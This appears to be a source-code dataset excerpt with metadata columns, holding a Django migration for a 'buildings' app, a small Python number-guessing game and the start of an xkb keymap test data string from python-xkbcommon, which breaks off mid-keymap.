| 27.443359 | 99 | 0.645007 | 1,518 | 14,051 | 5.760211 | 0.224638 | 0.027447 | 0.031107 | 0.029277 | 0.224268 | 0.15279 | 0.108417 | 0.0828 | 0.067704 | 0.067704 | 0 | 0.00592 | 0.254644 | 14,051 | 511 | 100 | 27.497065 | 0.828989 | 0.059925 | 0 | 0.245283 | 0 | 0 | 0.105846 | 0.014878 | 0 | 0 | 0 | 0.003914 | 0.002695 | 1 | 0.045822 | false | 0.002695 | 0.021563 | 0.013477 | 0.539084 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
6e4ca410b06d109c39b6e34b77d24f4733a52823 | 1,804 | py | Python | migrations/0017_auto_20210419_1810.py | andywar65/buildings | b772c052bd779ff9a33a31f345e9860203d55bf0 | [
"BSD-2-Clause"
] | 2 | 2021-02-04T14:13:44.000Z | 2021-12-08T18:30:05.000Z | migrations/0017_auto_20210419_1810.py | andywar65/buildings | b772c052bd779ff9a33a31f345e9860203d55bf0 | [
"BSD-2-Clause"
] | null | null | null | migrations/0017_auto_20210419_1810.py | andywar65/buildings | b772c052bd779ff9a33a31f345e9860203d55bf0 | [
"BSD-2-Clause"
] | null | null | null | # Generated by Django 3.1.2 on 2021-04-19 16:10
import django.contrib.gis.db.models.fields
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated Django migration for the "buildings" app: renames the
    # PlanGeometry verbose names, swaps the old "geometryz" field for a JSON
    # field, and updates help/verbose texts on several existing fields.
    # NOTE(review): the verbose_name/help_text strings are Italian and are
    # runtime data -- they must stay exactly as generated.

    # Must be applied after migration 0016 of the "buildings" app.
    dependencies = [
        ('buildings', '0016_auto_20210414_2325'),
    ]

    operations = [
        # Human-readable model names shown in the admin.
        migrations.AlterModelOptions(
            name='plangeometry',
            options={'verbose_name': 'Geometria della planimetria', 'verbose_name_plural': 'Geometrie della planimetria'},
        ),
        # Drop the old 3D geometry column.
        migrations.RemoveField(
            model_name='plangeometry',
            name='geometryz',
        ),
        # New JSON representation of the geometry; nullable so existing rows
        # migrate without a default.
        migrations.AddField(
            model_name='plangeometry',
            name='geomjson',
            field=models.JSONField(null=True),
        ),
        # GIS geometry column (help text notes it may be LineString or Polygon).
        migrations.AlterField(
            model_name='plangeometry',
            name='geometry',
            field=django.contrib.gis.db.models.fields.GeometryField(help_text='può essere LineString o Polygon', srid=4326, verbose_name='Geometria'),
        ),
        migrations.AlterField(
            model_name='plangeometry',
            name='is3d',
            field=models.BooleanField(default=False, help_text='Usa la terza dimensione nella vista in soggettiva', verbose_name="E' 3D"),
        ),
        # Cascade-delete geometries with their parent plan.
        migrations.AlterField(
            model_name='plangeometry',
            name='plan',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='plan_geometry', to='buildings.plan', verbose_name='Geometria della planimetria'),
        ),
        migrations.AlterField(
            model_name='plangeometry',
            name='popup',
            field=models.CharField(help_text='Descrizione della geometria nel popup', max_length=100, verbose_name='Popup'),
        ),
    ]
| 36.816327 | 176 | 0.628049 | 181 | 1,804 | 6.132597 | 0.486188 | 0.100901 | 0.113514 | 0.135135 | 0.281081 | 0.216216 | 0 | 0 | 0 | 0 | 0 | 0.029873 | 0.257761 | 1,804 | 48 | 177 | 37.583333 | 0.799104 | 0.024945 | 0 | 0.404762 | 1 | 0 | 0.244166 | 0.013091 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.071429 | 0 | 0.142857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
280f2cf885c0c90c1653eb09b88754da5d575fd7 | 222 | py | Python | Exercicios/ex_058.py | antoniosereno95/Python_Curso_em_Video | d706cba9ca7e5670881e5e06bceb5538971e99c0 | [
"MIT"
] | null | null | null | Exercicios/ex_058.py | antoniosereno95/Python_Curso_em_Video | d706cba9ca7e5670881e5e06bceb5538971e99c0 | [
"MIT"
] | null | null | null | Exercicios/ex_058.py | antoniosereno95/Python_Curso_em_Video | d706cba9ca7e5670881e5e06bceb5538971e99c0 | [
"MIT"
] | null | null | null | import random
# Number-guessing game: pick a random target in [0, 10] and prompt the user
# until they guess it, then report how many tries it took.
secret = random.randint(0, 10)
attempts = 1
guess = input('numero de 0 a 10: ')
while int(guess) != int(secret):
    print('tente novamente: ')
    attempts += 1
    guess = input()
print('parabens voce acretou em ', attempts, ' chances.')
| 18.5 | 52 | 0.608108 | 35 | 222 | 3.857143 | 0.657143 | 0.088889 | 0.103704 | 0.177778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.046243 | 0.220721 | 222 | 11 | 53 | 20.181818 | 0.734104 | 0 | 0 | 0 | 0 | 0 | 0.310811 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.111111 | 0 | 0.111111 | 0.222222 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
28171d7b865af35b34388d5c90bafda52ae1cab9 | 65,393 | py | Python | tests/data.py | dydyamotya/python-xkbcommon | 6712ef354b59cc95d3ad057c333dd8e9b3d1a1a6 | [
"MIT"
] | 12 | 2016-08-28T12:58:47.000Z | 2021-11-14T18:18:06.000Z | tests/data.py | dydyamotya/python-xkbcommon | 6712ef354b59cc95d3ad057c333dd8e9b3d1a1a6 | [
"MIT"
] | 11 | 2020-02-01T16:15:44.000Z | 2022-02-22T16:04:01.000Z | tests/data.py | dydyamotya/python-xkbcommon | 6712ef354b59cc95d3ad057c333dd8e9b3d1a1a6 | [
"MIT"
] | 3 | 2019-05-01T11:19:12.000Z | 2021-11-06T21:20:33.000Z | # Defines sample_keymap_string and sample_keymap_bytes
# Python 2 type Python 3 type
# sample_keymap_string unicode str
# sample_keymap_bytes str bytes
# This sample keymap is the output of xkbcomp :0 [filename] on my
# system - it wasn't chosen for any other reason. Some of the tests
# may rely on its details.
sample_keymap_string = r"""
xkb_keymap {
xkb_keycodes "evdev+aliases(qwerty)" {
minimum = 8;
maximum = 255;
<ESC> = 9;
<AE01> = 10;
<AE02> = 11;
<AE03> = 12;
<AE04> = 13;
<AE05> = 14;
<AE06> = 15;
<AE07> = 16;
<AE08> = 17;
<AE09> = 18;
<AE10> = 19;
<AE11> = 20;
<AE12> = 21;
<BKSP> = 22;
<TAB> = 23;
<AD01> = 24;
<AD02> = 25;
<AD03> = 26;
<AD04> = 27;
<AD05> = 28;
<AD06> = 29;
<AD07> = 30;
<AD08> = 31;
<AD09> = 32;
<AD10> = 33;
<AD11> = 34;
<AD12> = 35;
<RTRN> = 36;
<LCTL> = 37;
<AC01> = 38;
<AC02> = 39;
<AC03> = 40;
<AC04> = 41;
<AC05> = 42;
<AC06> = 43;
<AC07> = 44;
<AC08> = 45;
<AC09> = 46;
<AC10> = 47;
<AC11> = 48;
<TLDE> = 49;
<LFSH> = 50;
<BKSL> = 51;
<AB01> = 52;
<AB02> = 53;
<AB03> = 54;
<AB04> = 55;
<AB05> = 56;
<AB06> = 57;
<AB07> = 58;
<AB08> = 59;
<AB09> = 60;
<AB10> = 61;
<RTSH> = 62;
<KPMU> = 63;
<LALT> = 64;
<SPCE> = 65;
<CAPS> = 66;
<FK01> = 67;
<FK02> = 68;
<FK03> = 69;
<FK04> = 70;
<FK05> = 71;
<FK06> = 72;
<FK07> = 73;
<FK08> = 74;
<FK09> = 75;
<FK10> = 76;
<NMLK> = 77;
<SCLK> = 78;
<KP7> = 79;
<KP8> = 80;
<KP9> = 81;
<KPSU> = 82;
<KP4> = 83;
<KP5> = 84;
<KP6> = 85;
<KPAD> = 86;
<KP1> = 87;
<KP2> = 88;
<KP3> = 89;
<KP0> = 90;
<KPDL> = 91;
<LVL3> = 92;
<LSGT> = 94;
<FK11> = 95;
<FK12> = 96;
<AB11> = 97;
<KATA> = 98;
<HIRA> = 99;
<HENK> = 100;
<HKTG> = 101;
<MUHE> = 102;
<JPCM> = 103;
<KPEN> = 104;
<RCTL> = 105;
<KPDV> = 106;
<PRSC> = 107;
<RALT> = 108;
<LNFD> = 109;
<HOME> = 110;
<UP> = 111;
<PGUP> = 112;
<LEFT> = 113;
<RGHT> = 114;
<END> = 115;
<DOWN> = 116;
<PGDN> = 117;
<INS> = 118;
<DELE> = 119;
<I120> = 120;
<MUTE> = 121;
<VOL-> = 122;
<VOL+> = 123;
<POWR> = 124;
<KPEQ> = 125;
<I126> = 126;
<PAUS> = 127;
<I128> = 128;
<I129> = 129;
<HNGL> = 130;
<HJCV> = 131;
<AE13> = 132;
<LWIN> = 133;
<RWIN> = 134;
<COMP> = 135;
<STOP> = 136;
<AGAI> = 137;
<PROP> = 138;
<UNDO> = 139;
<FRNT> = 140;
<COPY> = 141;
<OPEN> = 142;
<PAST> = 143;
<FIND> = 144;
<CUT> = 145;
<HELP> = 146;
<I147> = 147;
<I148> = 148;
<I149> = 149;
<I150> = 150;
<I151> = 151;
<I152> = 152;
<I153> = 153;
<I154> = 154;
<I155> = 155;
<I156> = 156;
<I157> = 157;
<I158> = 158;
<I159> = 159;
<I160> = 160;
<I161> = 161;
<I162> = 162;
<I163> = 163;
<I164> = 164;
<I165> = 165;
<I166> = 166;
<I167> = 167;
<I168> = 168;
<I169> = 169;
<I170> = 170;
<I171> = 171;
<I172> = 172;
<I173> = 173;
<I174> = 174;
<I175> = 175;
<I176> = 176;
<I177> = 177;
<I178> = 178;
<I179> = 179;
<I180> = 180;
<I181> = 181;
<I182> = 182;
<I183> = 183;
<I184> = 184;
<I185> = 185;
<I186> = 186;
<I187> = 187;
<I188> = 188;
<I189> = 189;
<I190> = 190;
<FK13> = 191;
<FK14> = 192;
<FK15> = 193;
<FK16> = 194;
<FK17> = 195;
<FK18> = 196;
<FK19> = 197;
<FK20> = 198;
<FK21> = 199;
<FK22> = 200;
<FK23> = 201;
<FK24> = 202;
<MDSW> = 203;
<ALT> = 204;
<META> = 205;
<SUPR> = 206;
<HYPR> = 207;
<I208> = 208;
<I209> = 209;
<I210> = 210;
<I211> = 211;
<I212> = 212;
<I213> = 213;
<I214> = 214;
<I215> = 215;
<I216> = 216;
<I217> = 217;
<I218> = 218;
<I219> = 219;
<I220> = 220;
<I221> = 221;
<I222> = 222;
<I223> = 223;
<I224> = 224;
<I225> = 225;
<I226> = 226;
<I227> = 227;
<I228> = 228;
<I229> = 229;
<I230> = 230;
<I231> = 231;
<I232> = 232;
<I233> = 233;
<I234> = 234;
<I235> = 235;
<I236> = 236;
<I237> = 237;
<I238> = 238;
<I239> = 239;
<I240> = 240;
<I241> = 241;
<I242> = 242;
<I243> = 243;
<I244> = 244;
<I245> = 245;
<I246> = 246;
<I247> = 247;
<I248> = 248;
<I249> = 249;
<I250> = 250;
<I251> = 251;
<I252> = 252;
<I253> = 253;
indicator 1 = "Caps Lock";
indicator 2 = "Num Lock";
indicator 3 = "Scroll Lock";
indicator 4 = "Compose";
indicator 5 = "Kana";
indicator 6 = "Sleep";
indicator 7 = "Suspend";
indicator 8 = "Mute";
indicator 9 = "Misc";
indicator 10 = "Mail";
indicator 11 = "Charging";
virtual indicator 12 = "Shift Lock";
virtual indicator 13 = "Group 2";
virtual indicator 14 = "Mouse Keys";
alias <AC12> = <BKSL>;
alias <MENU> = <COMP>;
alias <HZTG> = <TLDE>;
alias <LMTA> = <LWIN>;
alias <RMTA> = <RWIN>;
alias <ALGR> = <RALT>;
alias <KPPT> = <I129>;
alias <LatQ> = <AD01>;
alias <LatW> = <AD02>;
alias <LatE> = <AD03>;
alias <LatR> = <AD04>;
alias <LatT> = <AD05>;
alias <LatY> = <AD06>;
alias <LatU> = <AD07>;
alias <LatI> = <AD08>;
alias <LatO> = <AD09>;
alias <LatP> = <AD10>;
alias <LatA> = <AC01>;
alias <LatS> = <AC02>;
alias <LatD> = <AC03>;
alias <LatF> = <AC04>;
alias <LatG> = <AC05>;
alias <LatH> = <AC06>;
alias <LatJ> = <AC07>;
alias <LatK> = <AC08>;
alias <LatL> = <AC09>;
alias <LatZ> = <AB01>;
alias <LatX> = <AB02>;
alias <LatC> = <AB03>;
alias <LatV> = <AB04>;
alias <LatB> = <AB05>;
alias <LatN> = <AB06>;
alias <LatM> = <AB07>;
};
xkb_types "complete" {
virtual_modifiers NumLock,Alt,LevelThree,LAlt,RAlt,RControl,LControl,ScrollLock,LevelFive,AltGr,Meta,Super,Hyper;
type "ONE_LEVEL" {
modifiers= none;
level_name[Level1]= "Any";
};
type "TWO_LEVEL" {
modifiers= Shift;
map[Shift]= Level2;
level_name[Level1]= "Base";
level_name[Level2]= "Shift";
};
type "ALPHABETIC" {
modifiers= Shift+Lock;
map[Shift]= Level2;
map[Lock]= Level2;
level_name[Level1]= "Base";
level_name[Level2]= "Caps";
};
type "KEYPAD" {
modifiers= Shift+NumLock;
map[Shift]= Level2;
map[NumLock]= Level2;
level_name[Level1]= "Base";
level_name[Level2]= "Number";
};
type "SHIFT+ALT" {
modifiers= Shift+Alt;
map[Shift+Alt]= Level2;
level_name[Level1]= "Base";
level_name[Level2]= "Shift+Alt";
};
type "PC_SUPER_LEVEL2" {
modifiers= Mod4;
map[Mod4]= Level2;
level_name[Level1]= "Base";
level_name[Level2]= "Super";
};
type "PC_CONTROL_LEVEL2" {
modifiers= Control;
map[Control]= Level2;
level_name[Level1]= "Base";
level_name[Level2]= "Control";
};
type "PC_LCONTROL_LEVEL2" {
modifiers= LControl;
map[LControl]= Level2;
level_name[Level1]= "Base";
level_name[Level2]= "LControl";
};
type "PC_RCONTROL_LEVEL2" {
modifiers= RControl;
map[RControl]= Level2;
level_name[Level1]= "Base";
level_name[Level2]= "RControl";
};
type "PC_ALT_LEVEL2" {
modifiers= Alt;
map[Alt]= Level2;
level_name[Level1]= "Base";
level_name[Level2]= "Alt";
};
type "PC_LALT_LEVEL2" {
modifiers= LAlt;
map[LAlt]= Level2;
level_name[Level1]= "Base";
level_name[Level2]= "LAlt";
};
type "PC_RALT_LEVEL2" {
modifiers= RAlt;
map[RAlt]= Level2;
level_name[Level1]= "Base";
level_name[Level2]= "RAlt";
};
type "CTRL+ALT" {
modifiers= Shift+Control+Alt+LevelThree;
map[Shift]= Level2;
preserve[Shift]= Shift;
map[LevelThree]= Level3;
map[Shift+LevelThree]= Level4;
preserve[Shift+LevelThree]= Shift;
map[Control+Alt]= Level5;
level_name[Level1]= "Base";
level_name[Level2]= "Shift";
level_name[Level3]= "Alt Base";
level_name[Level4]= "Shift Alt";
level_name[Level5]= "Ctrl+Alt";
};
type "LOCAL_EIGHT_LEVEL" {
modifiers= Shift+Lock+Control+LevelThree;
map[Shift+Lock]= Level1;
map[Shift]= Level2;
map[Lock]= Level2;
map[LevelThree]= Level3;
map[Shift+Lock+LevelThree]= Level3;
map[Shift+LevelThree]= Level4;
map[Lock+LevelThree]= Level4;
map[Control]= Level5;
map[Shift+Lock+Control]= Level5;
map[Shift+Control]= Level6;
map[Lock+Control]= Level6;
map[Control+LevelThree]= Level7;
map[Shift+Lock+Control+LevelThree]= Level7;
map[Shift+Control+LevelThree]= Level8;
map[Lock+Control+LevelThree]= Level8;
level_name[Level1]= "Base";
level_name[Level2]= "Shift";
level_name[Level3]= "Level3";
level_name[Level4]= "Shift Level3";
level_name[Level5]= "Ctrl";
level_name[Level6]= "Shift Ctrl";
level_name[Level7]= "Level3 Ctrl";
level_name[Level8]= "Shift Level3 Ctrl";
};
type "THREE_LEVEL" {
modifiers= Shift+LevelThree;
map[Shift]= Level2;
map[LevelThree]= Level3;
map[Shift+LevelThree]= Level3;
level_name[Level1]= "Base";
level_name[Level2]= "Shift";
level_name[Level3]= "Level3";
};
type "EIGHT_LEVEL" {
modifiers= Shift+LevelThree+LevelFive;
map[Shift]= Level2;
map[LevelThree]= Level3;
map[Shift+LevelThree]= Level4;
map[LevelFive]= Level5;
map[Shift+LevelFive]= Level6;
map[LevelThree+LevelFive]= Level7;
map[Shift+LevelThree+LevelFive]= Level8;
level_name[Level1]= "Base";
level_name[Level2]= "Shift";
level_name[Level3]= "Alt Base";
level_name[Level4]= "Shift Alt";
level_name[Level5]= "X";
level_name[Level6]= "X Shift";
level_name[Level7]= "X Alt Base";
level_name[Level8]= "X Shift Alt";
};
type "EIGHT_LEVEL_ALPHABETIC" {
modifiers= Shift+Lock+LevelThree+LevelFive;
map[Shift]= Level2;
map[Lock]= Level2;
map[LevelThree]= Level3;
map[Shift+LevelThree]= Level4;
map[Lock+LevelThree]= Level4;
map[Shift+Lock+LevelThree]= Level3;
map[LevelFive]= Level5;
map[Shift+LevelFive]= Level6;
map[Lock+LevelFive]= Level6;
map[LevelThree+LevelFive]= Level7;
map[Shift+LevelThree+LevelFive]= Level8;
map[Lock+LevelThree+LevelFive]= Level8;
map[Shift+Lock+LevelThree+LevelFive]= Level7;
level_name[Level1]= "Base";
level_name[Level2]= "Shift";
level_name[Level3]= "Alt Base";
level_name[Level4]= "Shift Alt";
level_name[Level5]= "X";
level_name[Level6]= "X Shift";
level_name[Level7]= "X Alt Base";
level_name[Level8]= "X Shift Alt";
};
type "EIGHT_LEVEL_SEMIALPHABETIC" {
modifiers= Shift+Lock+LevelThree+LevelFive;
map[Shift]= Level2;
map[Lock]= Level2;
map[LevelThree]= Level3;
map[Shift+LevelThree]= Level4;
map[Lock+LevelThree]= Level3;
preserve[Lock+LevelThree]= Lock;
map[Shift+Lock+LevelThree]= Level4;
preserve[Shift+Lock+LevelThree]= Lock;
map[LevelFive]= Level5;
map[Shift+LevelFive]= Level6;
map[Lock+LevelFive]= Level6;
preserve[Lock+LevelFive]= Lock;
map[Shift+Lock+LevelFive]= Level6;
preserve[Shift+Lock+LevelFive]= Lock;
map[LevelThree+LevelFive]= Level7;
map[Shift+LevelThree+LevelFive]= Level8;
map[Lock+LevelThree+LevelFive]= Level7;
preserve[Lock+LevelThree+LevelFive]= Lock;
map[Shift+Lock+LevelThree+LevelFive]= Level8;
preserve[Shift+Lock+LevelThree+LevelFive]= Lock;
level_name[Level1]= "Base";
level_name[Level2]= "Shift";
level_name[Level3]= "Alt Base";
level_name[Level4]= "Shift Alt";
level_name[Level5]= "X";
level_name[Level6]= "X Shift";
level_name[Level7]= "X Alt Base";
level_name[Level8]= "X Shift Alt";
};
type "FOUR_LEVEL" {
modifiers= Shift+LevelThree;
map[Shift]= Level2;
map[LevelThree]= Level3;
map[Shift+LevelThree]= Level4;
level_name[Level1]= "Base";
level_name[Level2]= "Shift";
level_name[Level3]= "Alt Base";
level_name[Level4]= "Shift Alt";
};
type "FOUR_LEVEL_ALPHABETIC" {
modifiers= Shift+Lock+LevelThree;
map[Shift]= Level2;
map[Lock]= Level2;
map[LevelThree]= Level3;
map[Shift+LevelThree]= Level4;
map[Lock+LevelThree]= Level4;
map[Shift+Lock+LevelThree]= Level3;
level_name[Level1]= "Base";
level_name[Level2]= "Shift";
level_name[Level3]= "Alt Base";
level_name[Level4]= "Shift Alt";
};
type "FOUR_LEVEL_SEMIALPHABETIC" {
modifiers= Shift+Lock+LevelThree;
map[Shift]= Level2;
map[Lock]= Level2;
map[LevelThree]= Level3;
map[Shift+LevelThree]= Level4;
map[Lock+LevelThree]= Level3;
preserve[Lock+LevelThree]= Lock;
map[Shift+Lock+LevelThree]= Level4;
preserve[Shift+Lock+LevelThree]= Lock;
level_name[Level1]= "Base";
level_name[Level2]= "Shift";
level_name[Level3]= "Alt Base";
level_name[Level4]= "Shift Alt";
};
type "FOUR_LEVEL_MIXED_KEYPAD" {
modifiers= Shift+NumLock+LevelThree;
map[Shift+NumLock]= Level1;
map[NumLock]= Level2;
map[Shift]= Level2;
map[LevelThree]= Level3;
map[NumLock+LevelThree]= Level3;
map[Shift+LevelThree]= Level4;
map[Shift+NumLock+LevelThree]= Level4;
level_name[Level1]= "Base";
level_name[Level2]= "Number";
level_name[Level3]= "Alt Base";
level_name[Level4]= "Shift Alt";
};
type "FOUR_LEVEL_X" {
modifiers= Shift+Control+Alt+LevelThree;
map[LevelThree]= Level2;
map[Shift+LevelThree]= Level3;
map[Control+Alt]= Level4;
level_name[Level1]= "Base";
level_name[Level2]= "Alt Base";
level_name[Level3]= "Shift Alt";
level_name[Level4]= "Ctrl+Alt";
};
type "SEPARATE_CAPS_AND_SHIFT_ALPHABETIC" {
modifiers= Shift+Lock+LevelThree;
map[Shift]= Level2;
map[Lock]= Level4;
preserve[Lock]= Lock;
map[LevelThree]= Level3;
map[Shift+LevelThree]= Level4;
map[Lock+LevelThree]= Level3;
preserve[Lock+LevelThree]= Lock;
map[Shift+Lock+LevelThree]= Level3;
level_name[Level1]= "Base";
level_name[Level2]= "Shift";
level_name[Level3]= "AltGr Base";
level_name[Level4]= "Shift AltGr";
};
type "FOUR_LEVEL_PLUS_LOCK" {
modifiers= Shift+Lock+LevelThree;
map[Shift]= Level2;
map[LevelThree]= Level3;
map[Shift+LevelThree]= Level4;
map[Lock]= Level5;
map[Shift+Lock]= Level2;
map[Lock+LevelThree]= Level3;
map[Shift+Lock+LevelThree]= Level4;
level_name[Level1]= "Base";
level_name[Level2]= "Shift";
level_name[Level3]= "Alt Base";
level_name[Level4]= "Shift Alt";
level_name[Level5]= "Lock";
};
type "FOUR_LEVEL_KEYPAD" {
modifiers= Shift+NumLock+LevelThree;
map[Shift]= Level2;
map[NumLock]= Level2;
map[LevelThree]= Level3;
map[Shift+LevelThree]= Level4;
map[NumLock+LevelThree]= Level4;
map[Shift+NumLock+LevelThree]= Level3;
level_name[Level1]= "Base";
level_name[Level2]= "Number";
level_name[Level3]= "Alt Base";
level_name[Level4]= "Alt Number";
};
};
xkb_compatibility "complete" {
virtual_modifiers NumLock,Alt,LevelThree,LAlt,RAlt,RControl,LControl,ScrollLock,LevelFive,AltGr,Meta,Super,Hyper;
interpret.useModMapMods= AnyLevel;
interpret.repeat= False;
interpret.locking= False;
interpret ISO_Level2_Latch+Exactly(Shift) {
useModMapMods=level1;
action= LatchMods(modifiers=Shift,clearLocks,latchToLock);
};
interpret Shift_Lock+AnyOf(Shift+Lock) {
action= LockMods(modifiers=Shift);
};
interpret Num_Lock+AnyOf(all) {
virtualModifier= NumLock;
action= LockMods(modifiers=NumLock);
};
interpret ISO_Level3_Shift+AnyOf(all) {
virtualModifier= LevelThree;
useModMapMods=level1;
action= SetMods(modifiers=LevelThree,clearLocks);
};
interpret ISO_Level3_Latch+AnyOf(all) {
virtualModifier= LevelThree;
useModMapMods=level1;
action= LatchMods(modifiers=LevelThree,clearLocks,latchToLock);
};
interpret ISO_Level3_Lock+AnyOf(all) {
virtualModifier= LevelThree;
useModMapMods=level1;
action= LockMods(modifiers=LevelThree);
};
interpret Alt_L+AnyOf(all) {
virtualModifier= Alt;
action= SetMods(modifiers=modMapMods,clearLocks);
};
interpret Alt_R+AnyOf(all) {
virtualModifier= Alt;
action= SetMods(modifiers=modMapMods,clearLocks);
};
interpret Meta_L+AnyOf(all) {
virtualModifier= Meta;
action= SetMods(modifiers=modMapMods,clearLocks);
};
interpret Meta_R+AnyOf(all) {
virtualModifier= Meta;
action= SetMods(modifiers=modMapMods,clearLocks);
};
interpret Super_L+AnyOf(all) {
virtualModifier= Super;
action= SetMods(modifiers=modMapMods,clearLocks);
};
interpret Super_R+AnyOf(all) {
virtualModifier= Super;
action= SetMods(modifiers=modMapMods,clearLocks);
};
interpret Hyper_L+AnyOf(all) {
virtualModifier= Hyper;
action= SetMods(modifiers=modMapMods,clearLocks);
};
interpret Hyper_R+AnyOf(all) {
virtualModifier= Hyper;
action= SetMods(modifiers=modMapMods,clearLocks);
};
interpret Scroll_Lock+AnyOf(all) {
virtualModifier= ScrollLock;
action= LockMods(modifiers=modMapMods);
};
interpret ISO_Level5_Shift+AnyOf(all) {
virtualModifier= LevelFive;
useModMapMods=level1;
action= SetMods(modifiers=LevelFive,clearLocks);
};
interpret ISO_Level5_Latch+AnyOf(all) {
virtualModifier= LevelFive;
useModMapMods=level1;
action= LatchMods(modifiers=LevelFive,clearLocks,latchToLock);
};
interpret ISO_Level5_Lock+AnyOf(all) {
virtualModifier= LevelFive;
useModMapMods=level1;
action= LockMods(modifiers=LevelFive);
};
interpret Mode_switch+AnyOfOrNone(all) {
virtualModifier= AltGr;
useModMapMods=level1;
action= SetGroup(group=+1);
};
interpret ISO_Level3_Shift+AnyOfOrNone(all) {
action= SetMods(modifiers=LevelThree,clearLocks);
};
interpret ISO_Level3_Latch+AnyOfOrNone(all) {
action= LatchMods(modifiers=LevelThree,clearLocks,latchToLock);
};
interpret ISO_Level3_Lock+AnyOfOrNone(all) {
action= LockMods(modifiers=LevelThree);
};
interpret ISO_Group_Latch+AnyOfOrNone(all) {
virtualModifier= AltGr;
useModMapMods=level1;
action= LatchGroup(group=2);
};
interpret ISO_Next_Group+AnyOfOrNone(all) {
virtualModifier= AltGr;
useModMapMods=level1;
action= LockGroup(group=+1);
};
interpret ISO_Prev_Group+AnyOfOrNone(all) {
virtualModifier= AltGr;
useModMapMods=level1;
action= LockGroup(group=-1);
};
interpret ISO_First_Group+AnyOfOrNone(all) {
action= LockGroup(group=1);
};
interpret ISO_Last_Group+AnyOfOrNone(all) {
action= LockGroup(group=2);
};
interpret KP_1+AnyOfOrNone(all) {
repeat= True;
action= MovePtr(x=-1,y=+1);
};
interpret KP_End+AnyOfOrNone(all) {
repeat= True;
action= MovePtr(x=-1,y=+1);
};
interpret KP_2+AnyOfOrNone(all) {
repeat= True;
action= MovePtr(x=+0,y=+1);
};
interpret KP_Down+AnyOfOrNone(all) {
repeat= True;
action= MovePtr(x=+0,y=+1);
};
interpret KP_3+AnyOfOrNone(all) {
repeat= True;
action= MovePtr(x=+1,y=+1);
};
interpret KP_Next+AnyOfOrNone(all) {
repeat= True;
action= MovePtr(x=+1,y=+1);
};
interpret KP_4+AnyOfOrNone(all) {
repeat= True;
action= MovePtr(x=-1,y=+0);
};
interpret KP_Left+AnyOfOrNone(all) {
repeat= True;
action= MovePtr(x=-1,y=+0);
};
interpret KP_6+AnyOfOrNone(all) {
repeat= True;
action= MovePtr(x=+1,y=+0);
};
interpret KP_Right+AnyOfOrNone(all) {
repeat= True;
action= MovePtr(x=+1,y=+0);
};
interpret KP_7+AnyOfOrNone(all) {
repeat= True;
action= MovePtr(x=-1,y=-1);
};
interpret KP_Home+AnyOfOrNone(all) {
repeat= True;
action= MovePtr(x=-1,y=-1);
};
interpret KP_8+AnyOfOrNone(all) {
repeat= True;
action= MovePtr(x=+0,y=-1);
};
interpret KP_Up+AnyOfOrNone(all) {
repeat= True;
action= MovePtr(x=+0,y=-1);
};
interpret KP_9+AnyOfOrNone(all) {
repeat= True;
action= MovePtr(x=+1,y=-1);
};
interpret KP_Prior+AnyOfOrNone(all) {
repeat= True;
action= MovePtr(x=+1,y=-1);
};
interpret KP_5+AnyOfOrNone(all) {
repeat= True;
action= PtrBtn(button=default);
};
interpret KP_Begin+AnyOfOrNone(all) {
repeat= True;
action= PtrBtn(button=default);
};
interpret KP_F2+AnyOfOrNone(all) {
repeat= True;
action= SetPtrDflt(affect=button,button=1);
};
interpret KP_Divide+AnyOfOrNone(all) {
repeat= True;
action= SetPtrDflt(affect=button,button=1);
};
interpret KP_F3+AnyOfOrNone(all) {
repeat= True;
action= SetPtrDflt(affect=button,button=2);
};
interpret KP_Multiply+AnyOfOrNone(all) {
repeat= True;
action= SetPtrDflt(affect=button,button=2);
};
interpret KP_F4+AnyOfOrNone(all) {
repeat= True;
action= SetPtrDflt(affect=button,button=3);
};
interpret KP_Subtract+AnyOfOrNone(all) {
repeat= True;
action= SetPtrDflt(affect=button,button=3);
};
interpret KP_Separator+AnyOfOrNone(all) {
repeat= True;
action= PtrBtn(button=default,count=2);
};
interpret KP_Add+AnyOfOrNone(all) {
repeat= True;
action= PtrBtn(button=default,count=2);
};
interpret KP_0+AnyOfOrNone(all) {
repeat= True;
action= LockPtrBtn(button=default,affect=lock);
};
interpret KP_Insert+AnyOfOrNone(all) {
repeat= True;
action= LockPtrBtn(button=default,affect=lock);
};
interpret KP_Decimal+AnyOfOrNone(all) {
repeat= True;
action= LockPtrBtn(button=default,affect=unlock);
};
interpret KP_Delete+AnyOfOrNone(all) {
repeat= True;
action= LockPtrBtn(button=default,affect=unlock);
};
interpret F25+AnyOfOrNone(all) {
repeat= True;
action= SetPtrDflt(affect=button,button=1);
};
interpret F26+AnyOfOrNone(all) {
repeat= True;
action= SetPtrDflt(affect=button,button=2);
};
interpret F27+AnyOfOrNone(all) {
repeat= True;
action= MovePtr(x=-1,y=-1);
};
interpret F29+AnyOfOrNone(all) {
repeat= True;
action= MovePtr(x=+1,y=-1);
};
interpret F31+AnyOfOrNone(all) {
repeat= True;
action= PtrBtn(button=default);
};
interpret F33+AnyOfOrNone(all) {
repeat= True;
action= MovePtr(x=-1,y=+1);
};
interpret F35+AnyOfOrNone(all) {
repeat= True;
action= MovePtr(x=+1,y=+1);
};
interpret Pointer_Button_Dflt+AnyOfOrNone(all) {
action= PtrBtn(button=default);
};
interpret Pointer_Button1+AnyOfOrNone(all) {
